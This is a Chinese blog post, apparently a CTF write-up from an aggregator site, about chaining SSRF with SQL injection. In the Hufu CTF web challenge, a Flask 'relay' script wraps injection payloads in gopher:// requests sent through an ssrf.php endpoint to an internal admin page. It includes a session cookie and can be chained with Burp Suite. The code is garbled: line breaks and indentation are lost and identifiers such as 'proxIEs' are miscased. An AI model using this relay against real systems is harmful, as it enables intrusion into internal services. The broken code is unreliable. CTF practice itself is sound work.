以本次虎符CTF为例,我们在进行常规sql注入的时候,会遇到这几种情况
①常常会因为构造网络请求麻烦
②写tamper嫌麻烦
这时候我们的中转注入就来了,这次的虎符CTF比赛当中有一个Web题需要我们频繁构造gopher去实现POST或者GET请求,这时候如果我们想要实现更自由的sql注入,便可使用,下面直接放上脚本,请自行理解,一点不难
from flask import Flask,requestfrom urllib.parse import quoteimport requestsdef urlencode(s): res='' for c in s: fuck=hex(ord(c)).split('0x')[1] if len(fuck)==1: fuck='0'+fuck res+="%"+fuck return resfuckHTML='''POST /admin.PHP http/1.1Host: 127.0.0.1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: {length}username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")tmpPayload= fuckHTML.split("\r\n")[-1]tmplength = len(tmpPayload) - len('{username}')url="http://eci-2zehhuwx9m3o88h32zup.cloudeci1.ichunqiu.com/ssrf.PHP?way=gopher%3A%2F%2F127.0.0.1:80%2F_"app = Flask(__name__)@app.route('/')def hello_world(): username=request.args.get('username') shit=fuckHTML.format(username=username,length=str(tmplength+len(username))) cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'} page=requests.get(url+urlencode(urlencode(shit)),proxIEs={'http':'http://127.0.0.1:8081'},cookies=cookies).text return pageif __name__ == '__main__': app.run()
当然我们可以去掉proxIEs参数,我这里加上只是为了和burpsuite实现联动
总结以上是内存溢出为你收集整理的[SQL注入技巧]配合Python-Flask的中转注入全部内容,希望文章能够帮你解决[SQL注入技巧]配合Python-Flask的中转注入所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)